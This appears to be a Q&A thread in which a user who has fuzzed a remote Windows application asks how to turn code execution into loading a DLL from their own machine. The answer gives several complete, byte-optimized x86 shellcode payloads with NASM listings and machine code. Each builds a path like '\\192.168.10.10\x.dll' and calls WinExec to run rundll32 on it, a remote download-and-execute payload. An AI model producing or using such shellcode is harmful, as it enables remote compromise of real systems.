Edit: DISCLAIMER- This is for educational purposes only as I am trying to learn shellcoding in x86 asm -- this is not a request for assistance in writing an in-the-wild exploit in any way.
Basically what I am asking for here - regardless of the "why" I am asking for it is to learn how to take a known piece of information stored in memory such as:
00xxxxxx ASCII "some information in ASCII"
And re-purpose the information stored at that address in my asm code. Would I perform a lea eax,[address]? I've tried a number of things and nothing results in the information stored in that address space appearing as expected.
--- original-ish post--- I am working on a POC shellcode x86 asm in Windows 32 bit. I've fuzzed a remote application, and am able to execute code - such as this: http://shell-storm.org/shellcode/files/shellcode-482.php
I noticed that the connecting address (attacking address) after the crash is always in the same hard coded address space showing in dump in the debugger as:
00aabbcc ASCII "192.168.1.XX."
I want to use that above shell-storm cmd.exe shellcode but somehow pass the address space containing my IP address in ASCII to it in order to download/run a rundll32.exe exploit. How would I go about referencing the address space (it does contain null first byte) and pass it along in x86 asm to cmd.exe?
This is just an example of what I used to get code execution. It also works with cmd.exe. Basically on the 4th and 5th lines I am passing "calc.exe" as 8 bytes of plain text if you will hex encoded. I want to modify this to basically execute rundll32 instead of calc or cmd where
rundll32.exe \\<HARD CODED ADDRESS REFERENCE HERE>\x.dll,0
where the above is simply where i insert the hard coded IP that i've observed in memory.
# this is the asm code for launching calc.exe successfully:
#0: 89 e5 mov ebp,esp
#2: 55 push ebp ; 4 bytes possibly with low byte = 0?
#3: 89 e5 mov ebp,esp
#5: 68 2e 65 78 65 push 0x6578652e ; ".exe"
#a: 68 63 61 6c 63 push 0x636c6163 ; "calc"
#f: 8d 45 f8 lea eax,[ebp-0x8] ; pointer to the string = mov eax, esp
#12: 50 push eax
#13: b8 c7 93 c2 77 mov eax,0x77c293c7 ; kernel32.WinExec
#18: ff d0 call eax
In the above example snippit, how would I, in lines 4-5 insert the ASCII value located at the previously mentioned memory address? That is the real meat of my question here regarding x86 asm. Would I use a memcpy? strcpy? I'm kind of a novice and definitely not a daily practitioner of asm.
After another look at the question, your actual question was about concatenating stuff with a runtime-variable C-string from a known address in the target system. Like sprintf(buf, '\\%s\x.dll', 0x00xxxxxx)
.
(Actually it turns out it's actually a known constant length and value, and you were just trying to save payload size by copying it.) Update, see below for 35 byte versions that hard-code the whole string in the payload, and a 31-byte version that builds the \\...\x.dll
string around the string instead of copying.
Copying data small amounts of data is hard. x86 instructions take code-size for the opcode and for the addressing modes (register or memory) of your data, unless except for instructions with implicit operands like stos
or movsb
, or push
. And even those still use bytes for the opcode. Repeated single-byte elements are hard to take advantage of. At a large scale, if you have room to write a decompressor, you could include run-length encoding or even Huffman coding. But when your data isn't much bigger than a few instructions, it's all just little tricks like in the last part of this answer.
But maybe efficiently hard-coding it can be small enough, without reading the 13-byte IP address from a known address (which takes at least 7 bytes to generate in a register with mov eax, imm32
/ not eax
to avoid 0 bytes in the immediate)
In 32-bit mode, repeated push imm32
will build up an arbitrary-length string on the stack (in reverse order, of course).
Start by pushing an xor-zeroed register to get a 0-terminated C string. Your literal string is pure text, so I don't see any reason to worry about zero bytes other than that. But if you did, pad with a filler character and overwrite it with a byte-store from your zero register.
If it's not naturally a multiple of 4 bytes, you can sometimes expand \
to \\
or \\\
or \.\
in paths. Or use push imm8
for the last character (which you push first), also pushing 3 bytes of zeros for free. (Assuming your character is 1..127 so sign-extension produces zeros instead of 0xFF). For this case specifically, WinExec splits on spaces so push ' '
can push a space + terminating 0 bytes.
And/or if 4-byte alignment of the stack isn't needed, use 4-byte push word imm16
for the last 2 bytes of data (operand-size prefix + opcode + 2 bytes of data = 4 bytes of code).
The payload-size overhead is 1 push
opcode byte per 4 string bytes, plus the terminator, with the string size potentially padded up to a multiple of 4 byte.
The other main option is to include the string as literal data after the payload.
...
jmp push_string_address
back_from_call:
;; pop eax ; or just leave the string address on the stack
...
push_string_address:
call back_from_call ; pushes the address of the end of the instruction and jumps
db "\\<HARD CODED ADDRESS REFERENCE HERE>\x.dll" ;, 0
; terminating zero byte in the target system will be there from its strcpy
Total overhead: 2-byte jmp rel8
+ 5-byte call rel32
. + 1-byte pop reg
if you do pop it instead of leaving it on the stack as an arg in the 32-bit calling convention.
The call
has to be backwards so the high bytes of the rel32 are FF
, not 00
for a positive displacement.
In 64-bit mode you can use RIP-relative addressing to easily avoid problematic bytes, even avoiding FF
bytes if you want. But jmp / call is actually still more compact.
I don't see where you're 0-terminating your string. In the "cmd.exe "
example you started with, trailing garbage after the space would still run cmd.exe
but with args, until there's a 0 byte on the stack anywhere.
Here any non-zero byte in the bottom of incoming EBP will come right after the .exe
in your string.
But all the stuff with ebp
at all is a waste of space. WinExec
takes 2 args: a pointer and an integer. The integer is apparently don't-care if it's out of range for being a GUI window behaviour code so its fine if the first 4 bytes of the string is also the UINT uCmdShow
argument. (Apparently the function doesn't use that arg as scratch space before reading the string, or at all). There's no benefit at all to saving the pre-buffer-overflow value of EBP or setting up a "stack frame".
The string breaks up perfectly into 4-byte chunks + one 1-byte that lets us get the terminator cheaply:
\\19
| 2.16
| 8.10
| .10\
| x.dl
| l
This is NASM source, where 'x.dl'
is a 32-bit constant that produces bytes in memory in that order. (Unlike MASM). NASM only process backslash as a C-style escape inside backquoted strings; single and double quotes are equivalent.
;;; NASM syntax (remove the "2 bytes" counts from the start of each line)
BITS 32
2 bytes push 'l' ; 'l\0\0\0'
5 bytes push 'x.dl'
5 bytes push '.10\'
5 bytes push '8.10'
5 bytes push '2.16'
5 bytes push '\\19'
; 27 bytes to construct the string
;; ESP points to the data we just pushed = 0-terminated string
1 byte push esp ; pushes the old value: pointer to the string
b8 c7 93 c2 77 mov eax,0x77c293c7 ; kernel32.WinExec
ff d0 call eax
Total: 35 bytes either way, above (push) or below (jmp/call)
NASM listing from nasm -l/dev/stdout foo.asm
(creating a flat binary of the shellcode, ready to hexdump into a C string).
1 bits 32
2 top:
3 00000000 EB07 jmp push_string_address
4 back_from_call:
5 ;; pop edi ; or just leave the string address on the stack
6
7 00000002 B8C793C277 mov eax,0x77c293c7 ; kernel32.WinExec
8 00000007 FFD0 call eax
9
10 push_string_address:
11 00000009 E8F4FFFFFF call back_from_call ; pushes the address of the end of the instruction and jumps
12 0000000E 5C5C3139322E313638- db "\\192.168.10.10\x.dll"
;, 0
12 00000017 2E31302E31305C782E-
12 00000020 646C6C
13 ; terminating zero byte in the target system will be there from the strcpy we overflowed
(00000023 23 size: db $ - top
is a line I included at the bottom to get NASM to calculate the size for me: 0x23 = 35 bytes)
The string itself takes 21 bytes, but the jmp + call take 7 bytes. Same as the opcode overhead from 6 push imm
instructions plus push esp
. So we're just at the break-even point where a longer string would be more efficient with jmp/call.
If that memory containing the "192.168.10.10"
is in a writeable page, we can write bytes before/after it to make the C-string we want.
;; build a string around the part we want, version 1 (35 bytes)
string_address equ 0x00abcdef
string_length equ 13 ; strlen("192.168.10.10")
mov edi, -(string_address - 2) ; 5B
neg edi ; 2B EDI points 2 byte before the existing string
mov word [edi], '\\' ; 5B store 2 bytes: prepend \\
mov dword [edi + string_length+2], '\x.d' ; 7B
push 'l'
pop eax ; 'l\0\0\0'
mov ah,al ; 2B copy low byte to 2nd byte
mov [edi + string_length+2 + 4], eax ; 3B append 'll\0\0'
;;; append '\x.dll\0\0'
push edi
mov eax,0x77c293c7 ; kernel32.WinExec
call eax
Amusingly / frustratingly, this is also 0x23 = 35 bytes!!!
I feel like there should be a more efficient way to get the end of the string written. push/pop + mov to duplicate the low byte feels like a lot.
Or I could mutate one bit-pattern in EAX into another with a 5-byte sub
or xor eax, imm32
. (Special EAX-only encoding without a ModRM byte). That can produce the zeros without having any in the machine code.
I see another way that saves bytes by moving EDI, and exploiting the redundancy of \
appearing multiple places, using stosb
/ stosd
to append AL or EAX. It saves 2 4 bytes. (See a previous version of the answer for "version 2")
;; build a string around the part we want, version 3 (31 bytes)
;; Assumes DF=0 when it runs, which is guaranteed by the calling convention
;; if we got here from a ret in compiler-generated code
1 bits 32
2 top:
3 str_address equ 0x00abcdef
4 str_length equ 13 ; strlen("192.168.10.10")
5
6 00000000 BF133254FF mov edi, -(str_address - 2) ; 5B
7 00000005 F7DF neg edi ; 2B EDI points 2 byte before the existing string
8 00000007 57 push edi ; push function arg now, before modifying EDI
9
10 00000008 B85C782E64 mov eax, '\x.d' ; low byte = backslash is reusable
11 0000000D AA stosb ; 1B *edi++ = AL '\'
12 0000000E AA stosb ; 1B *edi++ = AL '\'
14 ;;; we've now prepended \ ;;; EDI is pointing at the start of the original string
15
16 0000000F 83C70D add edi, str_length ; point EDI past the end, where we want to write more
17 00000012 AB stosd ; 1B *edi = eax; edi+=4; append '\x.d'
18 00000013 6A6C push 'l'
19 00000015 58 pop eax ; 'l\0\0\0' in a reg, constructed in 3 bytes
20 00000016 AA stosb ; append 'l'
21 00000017 AB stosd ; append 'l\0\0\0'
22 ;;; append '\x.dll\0\0\0'
23
24 00000018 B8C793C277 mov eax,0x77c293c7 ; kernel32.WinExec
25 0000001D FFD0 call eax
31 bytes
(NASM listing generated with nasm foo.asm -l/dev/stdout | cut -b -30,$((30+10))-
. You can strip out first 32 bytes of each line to recover the original source with <foo.lst cut -b 32- > foo.asm
so you can assemble it yourself.)
There may of course be room for more savings I missed.
Or there could be bugs that require extra bytes to fix, or different golfing.
Further ideas: The top byte of EDI is known to be zero. Maybe a 4-byte store of that at some point could get a zero in place then overwrite the bytes before?
I wonder if call far ptr16:32
with a hardcoded segment descriptor (assuming we know what Windows uses as the user-space value of cs
) would be smaller than mov/call eax? No: opcode + 4byte absolute addr + 2byte segment
= 7 bytes, same as 5-byte mov
+ 2-byte call eax
to reach an absolute address from an unknown EIP (so we can't use 5-byte call rel32
).
For more code-size optimization ideas in general, see https://codegolf.stackexchange.com/questions/132981/tips-for-golfing-in-x86-x64-machine-code